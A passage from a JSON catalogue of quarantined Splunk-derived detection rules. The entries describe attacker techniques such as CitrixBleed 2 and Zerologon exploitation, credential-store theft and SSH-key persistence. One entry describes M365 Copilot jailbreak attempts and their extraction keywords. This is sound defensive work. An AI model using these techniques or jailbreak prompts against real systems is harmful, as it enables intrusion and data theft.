If confirmed malicious, this could enable attackers to establish persistent remote connections, bypass security protocols, and gain unauthorized access to sensitive systems and data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-remote-services-add-trustedhost.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bef21d24-297e-45e3-9b9a-c6ac45450474", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_remote_services_add_trustedhost.yml" } }, { "id": "splunk-security-content-bef92f3f-7dc8-413a-8989-50581039e250", "type": "detection", "name": "Citrix ADC and Gateway CitrixBleed 2 Memory Disclosure", "description": "This detection identifies potential exploitation attempts of CVE-2025-5777 (CitrixBleed 2), a memory disclosure vulnerability in Citrix NetScaler ADC and Gateway.\nThe vulnerability is triggered by sending POST requests with incomplete form data to the /p/u/doAuthentication.do endpoint, causing the device to leak memory contents including session tokens and authentication materials.\nThis search looks for POST requests to the vulnerable endpoint that may indicate scanning or exploitation attempts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", 
"enabled": false, "path": "detections/splunk-imports/_quarantine/citrix-adc-and-gateway-citrixbleed-2-memory-disclosure.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bef92f3f-7dc8-413a-8989-50581039e250", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/citrix_adc_and_gateway_citrixbleed_2_memory_disclosure.yml" } }, { "id": "splunk-security-content-bf0304b6-6250-11ec-9d7c-acde48001122", "type": "detection", "name": "Linux Setuid Using Chmod Utility", "description": "The following analytic detects the execution of the chmod utility to set the SUID or SGID bit on files, which can allow users to temporarily gain root or group-level access. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments related to chmod. This activity is significant as it can indicate an attempt to escalate privileges or maintain persistence on a system. 
If confirmed malicious, an attacker could gain elevated access, potentially compromising sensitive data or critical system functions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-setuid-using-chmod-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bf0304b6-6250-11ec-9d7c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_setuid_using_chmod_utility.yml" } }, { "id": "splunk-security-content-bf0a378e-5f3c-11ec-a6de-acde48001122", "type": "detection", "name": "Linux At Application Execution", "description": "The following analytic detects the execution of the \"At\" application in Linux, which can be used by attackers to create persistence entries on a compromised host. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and parent process names associated with \"at\" or \"atd\". This activity is significant because the \"At\" application can be exploited to maintain unauthorized access or deliver additional malicious payloads. If confirmed malicious, this behavior could lead to data theft, ransomware attacks, or other severe consequences. 
Immediate investigation is required to determine the legitimacy of the execution and mitigate potential risks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-at-application-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bf0a378e-5f3c-11ec-a6de-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_at_application_execution.yml" } }, { "id": "splunk-security-content-bf39c3a3-b191-4d42-8738-9d9797bd0c3a", "type": "detection", "name": "Kubernetes DaemonSet Deployed", "description": "The following analytic detects the creation of a DaemonSet in a Kubernetes cluster. This behavior is identified by monitoring Kubernetes Audit logs for the creation event of a DaemonSet. DaemonSets ensure a specific pod runs on every node, making them a potential vector for persistent access. This activity is significant for a SOC as it could indicate an attempt to maintain persistent access to the Kubernetes infrastructure. 
If confirmed malicious, it could lead to persistent attacks, service disruptions, or unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-daemonset-deployed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bf39c3a3-b191-4d42-8738-9d9797bd0c3a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_daemonset_deployed.yml" } }, { "id": "splunk-security-content-bf471c94-0324-4b19-a113-d02749b969bc", "type": "detection", "name": "Windows Known GraphicalProton Loaded Modules", "description": "The following analytic detects the loading of DLL modules associated with the GraphicalProton backdoor implant, commonly used by SVR in targeted attacks. It leverages Sysmon EventCode 7 to identify specific DLLs loaded by processes. This activity is significant as it may indicate the presence of a sophisticated backdoor, warranting immediate investigation. 
If confirmed malicious, the attacker could gain persistent access to the compromised host, potentially leading to further exploitation and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-known-graphicalproton-loaded-modules.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bf471c94-0324-4b19-a113-d02749b969bc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_known_graphicalproton_loaded_modules.yml" } }, { "id": "splunk-security-content-bf7a06ec-f703-11ea-adc1-0242ac120002", "type": "detection", "name": "Detect Zerologon via Zeek", "description": "The following analytic detects attempts to exploit the Zerologon CVE-2020-1472 vulnerability via Zeek RPC. It leverages Zeek DCE-RPC data to identify specific operations: NetrServerPasswordSet2, NetrServerReqChallenge, and NetrServerAuthenticate3. This activity is significant because it indicates an attempt to gain unauthorized access to a domain controller, potentially leading to a complete takeover of an organization's IT infrastructure. If confirmed malicious, the impact could be severe, including data theft, ransomware deployment, or other devastating outcomes. 
Immediate investigation of the identified IP addresses and RPC operations is crucial.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-zerologon-via-zeek.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bf7a06ec-f703-11ea-adc1-0242ac120002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_zerologon_via_zeek.yml" } }, { "id": "splunk-security-content-bfc840f5-c9c6-454c-aa13-b46fd0bf1e79", "type": "detection", "name": "Okta Suspicious Activity Reported", "description": "The following analytic identifies when an associate reports a login attempt as suspicious via an email from Okta. It leverages Okta Identity Management logs, specifically the `user.account.report_suspicious_activity_by_enduser` event type. This activity is significant as it indicates potential unauthorized access attempts, warranting immediate investigation to prevent possible security breaches. 
If confirmed malicious, the attacker could gain unauthorized access to sensitive systems and data, leading to data theft, privilege escalation, or further compromise of the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-suspicious-activity-reported.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bfc840f5-c9c6-454c-aa13-b46fd0bf1e79", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_suspicious_activity_reported.yml" } }, { "id": "splunk-security-content-bfdaabe7-3db8-48c5-80c1-220f9b8f22be", "type": "detection", "name": "Windows Indirect Command Execution Via Series Of Forfiles", "description": "The following analytic detects excessive usage of the forfiles.exe process, which is often indicative of post-exploitation activities. The detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include process GUID, process name, and parent process. This activity is significant because forfiles.exe can be abused to execute commands on multiple files, a technique used by ransomware like Prestige. 
If confirmed malicious, this behavior could allow attackers to enumerate files, potentially leading to data exfiltration or further malicious actions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-indirect-command-execution-via-series-of-forfiles.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bfdaabe7-3db8-48c5-80c1-220f9b8f22be", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_indirect_command_execution_via_series_of_forfiles.yml" } }, { "id": "splunk-security-content-bfe94226-8c10-11eb-a4b3-acde48001122", "type": "detection", "name": "CertUtil With Decode Argument", "description": "The following analytic detects the use of CertUtil.exe with the 'decode' argument, which may indicate an attempt to decode a previously encoded file, potentially containing malicious payloads. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving CertUtil.exe. This activity is significant because attackers often use CertUtil to decode malicious files downloaded from the internet, which are then executed to compromise the system. 
If confirmed malicious, this activity could lead to unauthorized code execution, further system compromise, and potential data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1140" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/certutil-with-decode-argument.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bfe94226-8c10-11eb-a4b3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/certutil_with_decode_argument.yml" } }, { "id": "splunk-security-content-bff0e7a0-317f-11ec-ab4e-acde48001122", "type": "detection", "name": "Wmic NonInteractive App Uninstallation", "description": "The following analytic identifies the use of the WMIC command-line tool attempting to uninstall applications non-interactively. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific command-line patterns associated with WMIC. This activity is significant because it is uncommon and may indicate an attempt to evade detection by uninstalling security software, as seen in IcedID malware campaigns. 
If confirmed malicious, this behavior could allow an attacker to disable security defenses, facilitating further compromise and persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wmic-noninteractive-app-uninstallation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bff0e7a0-317f-11ec-ab4e-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/wmic_noninteractive_app_uninstallation.yml" } }, { "id": "splunk-security-content-c026e3dd-7e18-4abb-8f41-929e836efe74", "type": "detection", "name": "Detect Excessive Account Lockouts From Endpoint", "description": "The following analytic detects endpoints causing a high number of account lockouts within a short period. It leverages the Windows security event logs ingested into the `Change` datamodel, specifically under the `Account_Management` node, to identify and count lockout events. This activity is significant as it may indicate a brute-force attack or misconfigured system causing repeated authentication failures. 
If confirmed malicious, this behavior could lead to account lockouts, disrupting user access and potentially indicating an ongoing attack attempting to compromise user credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-excessive-account-lockouts-from-endpoint.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c026e3dd-7e18-4abb-8f41-929e836efe74", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_excessive_account_lockouts_from_endpoint.yml" } }, { "id": "splunk-security-content-c03d4a49-cf9d-435b-86e9-c6f8c9b6c42e", "type": "detection", "name": "Linux Auditd Data Transfer Size Limits Via Split Syscall", "description": "The following analytic detects suspicious data transfer activities that involve the use of the `split` syscall, potentially indicating an attempt to evade detection by breaking large files into smaller parts. Attackers may use this technique to bypass size-based security controls, facilitating the covert exfiltration of sensitive data. 
By monitoring for unusual or unauthorized use of the `split` syscall, this analytic helps identify potential data exfiltration attempts, allowing security teams to intervene and prevent the unauthorized transfer of critical information from the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1030" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-data-transfer-size-limits-via-split-syscall.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c03d4a49-cf9d-435b-86e9-c6f8c9b6c42e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_data_transfer_size_limits_via_split_syscall.yml" } }, { "id": "splunk-security-content-c04ef40c-72da-11ec-8eac-acde48001122", "type": "detection", "name": "Linux Possible Ssh Key File Creation", "description": "The following analytic detects the creation of SSH key files in the ~/.ssh/ directory. It leverages filesystem data to identify new files in this specific path. This activity is significant because threat actors often create SSH keys to gain persistent access and escalate privileges on a compromised host. 
If confirmed malicious, this could allow attackers to remotely access the machine using the OpenSSH daemon service, leading to potential unauthorized control and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-possible-ssh-key-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c04ef40c-72da-11ec-8eac-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_possible_ssh_key_file_creation.yml" } }, { "id": "splunk-security-content-c051b68c-60f7-4022-b3ad-773bec7a225b", "type": "detection", "name": "Windows Process Writing File to World Writable Path", "description": "The following analytic identifies a process writing a .txt file to a world writable path. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on file creation events within specific directories. This activity is significant as adversaries often use such techniques to deliver payloads to a system, which is uncommon for legitimate processes. 
If confirmed malicious, this behavior could allow attackers to execute arbitrary code, escalate privileges, or maintain persistence within the environment, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-process-writing-file-to-world-writable-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c051b68c-60f7-4022-b3ad-773bec7a225b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_process_writing_file_to_world_writable_path.yml" } }, { "id": "splunk-security-content-c068d53f-6aaa-4558-8011-3734df878266", "type": "detection", "name": "O365 Application Registration Owner Added", "description": "The following analytic identifies instances where a new owner is assigned to an application registration within an Azure AD and Office 365 tenant. It leverages O365 audit logs, specifically events related to changes in owner assignments within the AzureActiveDirectory workload. This activity is significant because assigning a new owner to an application registration can grant significant control over the application's configuration, permissions, and behavior. 
If confirmed malicious, an attacker could modify the application's settings, permissions, and behavior, leading to unauthorized data access, privilege escalation, or the introduction of malicious behavior within the application's operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-application-registration-owner-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c068d53f-6aaa-4558-8011-3734df878266", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_application_registration_owner_added.yml" } }, { "id": "splunk-security-content-c07c7138-edf5-4a16-8b24-3842599235bf", "type": "detection", "name": "Windows RMM Named Pipe", "description": "The following analytic detects the creation or connection to known suspicious named pipes, which is a technique often used by offensive tools.\nIt leverages Sysmon EventCodes 17 and 18 to identify known default pipe names used by RMM tools.\nIf confirmed malicious, this could allow an attacker to abuse these to potentially gain persistence, command and control, or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1559", "T1021.002", "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": 
"detections/splunk-imports/_quarantine/windows-rmm-named-pipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c07c7138-edf5-4a16-8b24-3842599235bf", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rmm_named_pipe.yml" } }, { "id": "splunk-security-content-c08014de-cc5a-42de-9775-76ecd5b37bbd", "type": "detection", "name": "Windows Renamed Powershell Execution", "description": "The following analytic identifies instances where the PowerShell executable has been renamed and executed under an alternate filename. This behavior is commonly associated with attempts to evade security controls or bypass logging mechanisms that monitor standard PowerShell usage. While rare in legitimate environments, renamed PowerShell binaries are frequently observed in malicious campaigns leveraging Living-off-the-Land Binaries (LOLBins) and fileless malware techniques. 
This detection flags executions of PowerShell where the process name does not match the default powershell.exe or pwsh.exe, especially when invoked from unusual paths or accompanied by suspicious command-line arguments.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-renamed-powershell-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c08014de-cc5a-42de-9775-76ecd5b37bbd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_renamed_powershell_execution.yml" } }, { "id": "splunk-security-content-c0c5a479-bf57-4ca0-af3a-4c7081e5ba05", "type": "detection", "name": "Windows Credentials from Password Stores Creation", "description": "The following analytic detects the execution of the Windows OS tool cmdkey.exe, which is used to create stored usernames, passwords, or credentials. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs and command-line arguments. This activity is significant because cmdkey.exe is often abused by post-exploitation tools and malware, such as Darkgate, to gain unauthorized access. 
If confirmed malicious, this behavior could allow attackers to escalate privileges and maintain persistence on the targeted host, facilitating further attacks and potential data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-credentials-from-password-stores-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c0c5a479-bf57-4ca0-af3a-4c7081e5ba05", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_credentials_from_password_stores_creation.yml" } }, { "id": "splunk-security-content-c0d810f4-230c-44ea-b703-989da02ff145", "type": "detection", "name": "Linux MySQL Privilege Escalation", "description": "The following analytic detects the execution of MySQL commands with elevated privileges using sudo, which can lead to privilege escalation. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line details. This activity is significant because it indicates a potential misuse of MySQL to execute system commands as root, which could allow an attacker to gain root shell access. 
If confirmed malicious, this could result in full control over the affected system, leading to severe security breaches and unauthorized access to sensitive data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-mysql-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c0d810f4-230c-44ea-b703-989da02ff145", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_mysql_privilege_escalation.yml" } }, { "id": "splunk-security-content-c0d89118-3f89-4cd7-8140-1f39e7210681", "type": "detection", "name": "Windows Credentials Access via VaultCli Module", "description": "The following analytic detects potentially abnormal interactions with VaultCLI.dll, particularly those initiated by processes located in publicly writable Windows folder paths. The VaultCLI.dll module allows processes to extract credentials from the Windows Credential Vault. It was seen being abused by information stealers such as Meduza. The analytic monitors suspicious API calls, unauthorized credential access patterns, and anomalous process behaviors indicative of malicious activity. 
By leveraging a combination of signature-based detection and behavioral analysis, it effectively flags attempts to misuse the vault for credential theft, enabling swift response to protect sensitive user data and ensure system security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-credentials-access-via-vaultcli-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c0d89118-3f89-4cd7-8140-1f39e7210681", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_credentials_access_via_vaultcli_module.yml" } }, { "id": "splunk-security-content-c0e5dd5a-2117-41d5-a04c-82a762a86a38", "type": "detection", "name": "Windows New Custom Security Descriptor Set On EventLog Channel", "description": "The following analytic detects suspicious modifications to the EventLog security descriptor registry value for defense evasion. It leverages data from the Endpoint.Registry data model, focusing on changes to the \"CustomSD\" value within the \"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Eventlog\\\\CustomSD\" path. This activity is significant as changes to the access permissions of the event log could blind security products and help attackers evade defenses. 
If confirmed malicious, this could allow attackers to block users and security products from viewing, ingesting, and interacting with event logs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-new-custom-security-descriptor-set-on-eventlog-channel.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c0e5dd5a-2117-41d5-a04c-82a762a86a38", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_new_custom_security_descriptor_set_on_eventlog_channel.yml" } }, { "id": "splunk-security-content-c0ed2aca-5666-45b3-813f-ddfac3f3eda0", "type": "detection", "name": "Windows MOVEit Transfer Writing ASPX", "description": "The following analytic detects the creation of new ASPX files in the MOVEit Transfer application's \"wwwroot\" directory. It leverages endpoint data on process and filesystem activity to identify processes responsible for creating these files. This activity is significant as it may indicate exploitation of a critical zero-day vulnerability in MOVEit Transfer, used by threat actors to install malicious ASPX files. 
If confirmed malicious, this could lead to exfiltration of sensitive data, including user credentials and file metadata, posing a severe risk to the organization's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-moveit-transfer-writing-aspx.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c0ed2aca-5666-45b3-813f-ddfac3f3eda0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_moveit_transfer_writing_aspx.yml" } }, { "id": "splunk-security-content-c0ee37bb-ed43-4632-8e38-060fba80b0b2", "type": "detection", "name": "M365 Copilot Information Extraction Jailbreak Attack", "description": "Detects M365 Copilot information extraction jailbreak attacks that attempt to obtain sensitive, classified, or comprehensive data through various social engineering techniques including fictional entity impersonation, bulk data requests, and privacy bypass attempts. The detection searches exported eDiscovery prompt logs for extraction keywords like \"transcendent,\" \"tell me everything,\" \"confidential,\" \"dump,\" \"extract,\" \"reveal,\" and \"bypass\" in the Subject_Title field, categorizing each attempt by extraction type and assigning severity levels (CRITICAL for classified/proprietary data, HIGH for bulk extraction or privacy bypass). 
Prompts are further analyzed for compound risk patterns such as \"Confidential+Extraction\" or \"Bulk_Request+Bypass,\" filtering out low-severity cases to surface the most dangerous attempts to exfiltrate sensitive organizational information through AI manipulation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/m365-copilot-information-extraction-jailbreak-attack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c0ee37bb-ed43-4632-8e38-060fba80b0b2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/m365_copilot_information_extraction_jailbreak_attack.yml" } }, { "id": "splunk-security-content-c11f2b57-92c1-4cd2-b46c-064eafb833ac", "type": "detection", "name": "MacOS plutil", "description": "The following analytic detects the usage of the `plutil` command to modify plist files on macOS systems. It leverages osquery to monitor process events, specifically looking for executions of `/usr/bin/plutil`. This activity is 